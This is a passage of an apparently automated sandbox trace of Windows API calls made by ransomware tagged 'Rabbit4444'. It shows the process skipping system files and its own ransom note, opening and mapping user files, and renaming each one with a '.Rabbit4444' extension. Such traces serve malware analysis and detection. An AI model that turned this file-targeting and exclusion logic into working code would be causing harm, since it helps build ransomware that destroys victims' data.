param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}.Rabbit4444") returned 156 [0068.323] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{ac7b9de5-2bb7-4d1f-8d6b-195490d0c9ea}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{AC7B9DE5-2BB7-4D1F-8D6B-195490D0C9EA}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{ac7b9de5-2bb7-4d1f-8d6b-195490d0c9ea}.rabbit4444"), dwFlags=0x1) returned 1 [0068.324] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b68c4c9, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9b68c4c9, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{AEA45D7D-8825-46DB-820C-29097A667BA7}", cAlternateFileName="{AEA45~1")) returned 1 [0068.324] lstrcmpiW (lpString1="{AEA45D7D-8825-46DB-820C-29097A667BA7}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.324] lstrcmpiW (lpString1="{AEA45D7D-8825-46DB-820C-29097A667BA7}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.324] lstrcmpiW (lpString1="{AEA45D7D-8825-46DB-820C-29097A667BA7}", lpString2="Rabbit4444.exe") returned -1 [0068.324] lstrcmpiW (lpString1="{AEA45D7D-8825-46DB-820C-29097A667BA7}", lpString2=".") returned 1 [0068.324] lstrcmpiW (lpString1="{AEA45D7D-8825-46DB-820C-29097A667BA7}", lpString2="..") returned 1 [0068.324] lstrcmpiW (lpString1="{AEA45D7D-8825-46DB-820C-29097A667BA7}", lpString2="windows") returned -1 [0068.324] lstrcmpiW (lpString1="{AEA45D7D-8825-46DB-820C-29097A667BA7}", lpString2="bootmgr") returned -1 [0068.324] lstrcmpiW (lpString1="{AEA45D7D-8825-46DB-820C-29097A667BA7}", lpString2="pagefile.sys") returned -1 [0068.324] lstrcmpiW (lpString1="{AEA45D7D-8825-46DB-820C-29097A667BA7}", lpString2="boot") returned -1 [0068.324] lstrcmpiW (lpString1="{AEA45D7D-8825-46DB-820C-29097A667BA7}", lpString2="ids.txt") returned -1 [0068.324] lstrcmpiW (lpString1="{AEA45D7D-8825-46DB-820C-29097A667BA7}", lpString2="NTUSER.DAT") returned -1 [0068.324] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{AEA45D7D-8825-46DB-820C-29097A667BA7}" | out: lpString1="{AEA45D7D-8825-46DB-820C-29097A667BA7}") returned="{AEA45D7D-8825-46DB-820C-29097A667BA7}" [0068.324] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{AEA45D7D-8825-46DB-820C-29097A667BA7}", dwFileAttributes=0x0) returned 1 [0068.325] lstrlenW (lpString="{AEA45D7D-8825-46DB-820C-29097A667BA7}") returned 38 [0068.325] lstrlenW (lpString="Rabbit4444") returned 10 [0068.325] lstrcmpiW (lpString1="97A667BA7}", lpString2="Rabbit4444") returned -1 [0068.325] lstrlenW (lpString=".dll") returned 4 [0068.325] lstrcmpiW (lpString1="BA7}", lpString2=".dll") returned 1 [0068.325] lstrlenW (lpString=".lnk") returned 4 [0068.325] lstrcmpiW (lpString1="BA7}", lpString2=".lnk") returned 1 [0068.325] lstrlenW (lpString=".ini") returned 4 [0068.325] lstrcmpiW (lpString1="BA7}", lpString2=".ini") returned 1 [0068.325] lstrlenW (lpString=".sys") returned 4 [0068.325] lstrcmpiW (lpString1="BA7}", lpString2=".sys") returned 1 [0068.325] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{AEA45D7D-8825-46DB-820C-29097A667BA7}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{aea45d7d-8825-46db-820c-29097a667ba7}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.325] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.325] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15963619203) returned 1 [0068.325] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0068.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0068.326] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.327] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.328] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.328] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0068.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.328] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0068.328] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0068.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0068.328] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15963880289) returned 1 [0068.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0068.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0068.328] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.328] CloseHandle (hObject=0x29c) returned 1 [0068.328] CloseHandle (hObject=0x280) returned 1 [0068.328] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{AEA45D7D-8825-46DB-820C-29097A667BA7}.Rabbit4444") returned 156 [0068.328] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{AEA45D7D-8825-46DB-820C-29097A667BA7}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{aea45d7d-8825-46db-820c-29097a667ba7}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{AEA45D7D-8825-46DB-820C-29097A667BA7}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{aea45d7d-8825-46db-820c-29097a667ba7}.rabbit4444"), dwFlags=0x1) returned 1 [0068.329] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cc9cd0a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9cc9cd0a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44fdc101, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}", cAlternateFileName="{B52F0~1")) returned 1 [0068.329] lstrcmpiW (lpString1="{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.329] lstrcmpiW (lpString1="{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.329] lstrcmpiW (lpString1="{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}", lpString2="Rabbit4444.exe") returned -1 [0068.329] lstrcmpiW (lpString1="{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}", lpString2=".") returned 1 [0068.329] lstrcmpiW (lpString1="{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}", lpString2="..") returned 1 [0068.329] lstrcmpiW (lpString1="{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}", lpString2="windows") returned -1 [0068.329] lstrcmpiW (lpString1="{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}", lpString2="bootmgr") returned -1 [0068.329] lstrcmpiW (lpString1="{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}", lpString2="pagefile.sys") returned -1 [0068.329] lstrcmpiW (lpString1="{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}", lpString2="boot") returned -1 [0068.329] lstrcmpiW (lpString1="{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}", lpString2="ids.txt") returned -1 [0068.329] lstrcmpiW (lpString1="{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}", lpString2="NTUSER.DAT") returned -1 [0068.330] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}" | out: lpString1="{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}") returned="{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}" [0068.330] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}", dwFileAttributes=0x0) returned 1 [0068.330] lstrlenW (lpString="{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}") returned 38 [0068.330] lstrlenW (lpString="Rabbit4444") returned 10 [0068.330] lstrcmpiW (lpString1="A5CA596FE}", lpString2="Rabbit4444") returned -1 [0068.330] lstrlenW (lpString=".dll") returned 4 [0068.330] lstrcmpiW (lpString1="6FE}", lpString2=".dll") returned 1 [0068.330] lstrlenW (lpString=".lnk") returned 4 [0068.330] lstrcmpiW (lpString1="6FE}", lpString2=".lnk") returned 1 [0068.330] lstrlenW (lpString=".ini") returned 4 [0068.330] lstrcmpiW (lpString1="6FE}", lpString2=".ini") returned 1 [0068.330] lstrlenW (lpString=".sys") returned 4 [0068.330] lstrcmpiW (lpString1="6FE}", lpString2=".sys") returned 1 [0068.330] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{b52f04da-8153-47b9-a93e-aeaa5ca596fe}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.331] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.331] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15964133846) returned 1 [0068.331] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.331] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0068.331] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0068.331] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.332] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0068.333] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0068.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.333] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0068.333] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.333] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0068.333] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15964394296) returned 1 [0068.333] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0068.333] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0068.333] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.333] CloseHandle (hObject=0x29c) returned 1 [0068.333] CloseHandle (hObject=0x280) returned 1 [0068.334] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}.Rabbit4444") returned 156 [0068.334] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{b52f04da-8153-47b9-a93e-aeaa5ca596fe}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{B52F04DA-8153-47B9-A93E-AEAA5CA596FE}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{b52f04da-8153-47b9-a93e-aeaa5ca596fe}.rabbit4444"), dwFlags=0x1) returned 1 [0068.334] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c16d0b7, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9c16d0b7, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}", cAlternateFileName="{B6A7D~1")) returned 1 [0068.334] lstrcmpiW (lpString1="{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.334] lstrcmpiW (lpString1="{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.334] lstrcmpiW (lpString1="{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}", lpString2="Rabbit4444.exe") returned -1 [0068.334] lstrcmpiW (lpString1="{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}", lpString2=".") returned 1 [0068.334] lstrcmpiW (lpString1="{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}", lpString2="..") returned 1 [0068.335] lstrcmpiW (lpString1="{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}", lpString2="windows") returned -1 [0068.335] lstrcmpiW (lpString1="{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}", lpString2="bootmgr") returned -1 [0068.335] lstrcmpiW (lpString1="{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}", lpString2="pagefile.sys") returned -1 [0068.335] lstrcmpiW (lpString1="{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}", lpString2="boot") returned -1 [0068.335] lstrcmpiW (lpString1="{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}", lpString2="ids.txt") returned -1 [0068.335] lstrcmpiW (lpString1="{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}", lpString2="NTUSER.DAT") returned -1 [0068.335] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}" | out: lpString1="{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}") returned="{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}" [0068.335] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}", dwFileAttributes=0x0) returned 1 [0068.335] lstrlenW (lpString="{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}") returned 38 [0068.335] lstrlenW (lpString="Rabbit4444") returned 10 [0068.335] lstrcmpiW (lpString1="FC23B90AD}", lpString2="Rabbit4444") returned -1 [0068.336] lstrlenW (lpString=".dll") returned 4 [0068.336] lstrcmpiW (lpString1="0AD}", lpString2=".dll") returned 1 [0068.336] lstrlenW (lpString=".lnk") returned 4 [0068.336] lstrcmpiW (lpString1="0AD}", lpString2=".lnk") returned 1 [0068.336] lstrlenW (lpString=".ini") returned 4 [0068.336] lstrcmpiW (lpString1="0AD}", lpString2=".ini") returned 1 [0068.336] lstrlenW (lpString=".sys") returned 4 [0068.336] lstrcmpiW (lpString1="0AD}", lpString2=".sys") returned 1 [0068.336] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{b6a7df63-99c2-4534-89cf-c0afc23b90ad}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.336] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.336] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15964690217) returned 1 [0068.336] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.336] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0068.336] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0068.336] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.345] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.346] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.346] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0068.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.346] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0068.346] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0068.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0068.346] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15965679299) returned 1 [0068.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0068.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0068.346] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.346] CloseHandle (hObject=0x29c) returned 1 [0068.346] CloseHandle (hObject=0x280) returned 1 [0068.346] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}.Rabbit4444") returned 156 [0068.346] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{b6a7df63-99c2-4534-89cf-c0afc23b90ad}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{B6A7DF63-99C2-4534-89CF-C0AFC23B90AD}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{b6a7df63-99c2-4534-89cf-c0afc23b90ad}.rabbit4444"), dwFlags=0x1) returned 1 [0068.347] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c205a4c, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9c205a4c, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}", cAlternateFileName="{BCEB7~1")) returned 1 [0068.347] lstrcmpiW (lpString1="{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.347] lstrcmpiW (lpString1="{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.347] lstrcmpiW (lpString1="{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}", lpString2="Rabbit4444.exe") returned -1 [0068.347] lstrcmpiW (lpString1="{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}", lpString2=".") returned 1 [0068.347] lstrcmpiW (lpString1="{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}", lpString2="..") returned 1 [0068.347] lstrcmpiW (lpString1="{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}", lpString2="windows") returned -1 [0068.348] lstrcmpiW (lpString1="{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}", lpString2="bootmgr") returned -1 [0068.348] lstrcmpiW (lpString1="{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}", lpString2="pagefile.sys") returned -1 [0068.348] lstrcmpiW (lpString1="{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}", lpString2="boot") returned -1 [0068.348] lstrcmpiW (lpString1="{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}", lpString2="ids.txt") returned -1 [0068.348] lstrcmpiW (lpString1="{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}", lpString2="NTUSER.DAT") returned -1 [0068.348] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}" | out: lpString1="{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}") returned="{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}" [0068.348] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}", dwFileAttributes=0x0) returned 1 [0068.348] lstrlenW (lpString="{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}") returned 38 [0068.348] lstrlenW (lpString="Rabbit4444") returned 10 [0068.348] lstrcmpiW (lpString1="62F84C0B8}", lpString2="Rabbit4444") returned -1 [0068.348] lstrlenW (lpString=".dll") returned 4 [0068.348] lstrcmpiW (lpString1="0B8}", lpString2=".dll") returned 1 [0068.348] lstrlenW (lpString=".lnk") returned 4 [0068.348] lstrcmpiW (lpString1="0B8}", lpString2=".lnk") returned 1 [0068.348] lstrlenW (lpString=".ini") returned 4 [0068.348] lstrcmpiW (lpString1="0B8}", lpString2=".ini") returned 1 [0068.348] lstrlenW (lpString=".sys") returned 4 [0068.348] lstrcmpiW (lpString1="0B8}", lpString2=".sys") returned 1 [0068.348] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{bceb7afa-8a96-4ee0-a2df-1a462f84c0b8}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.349] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.349] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15965947150) returned 1 [0068.349] 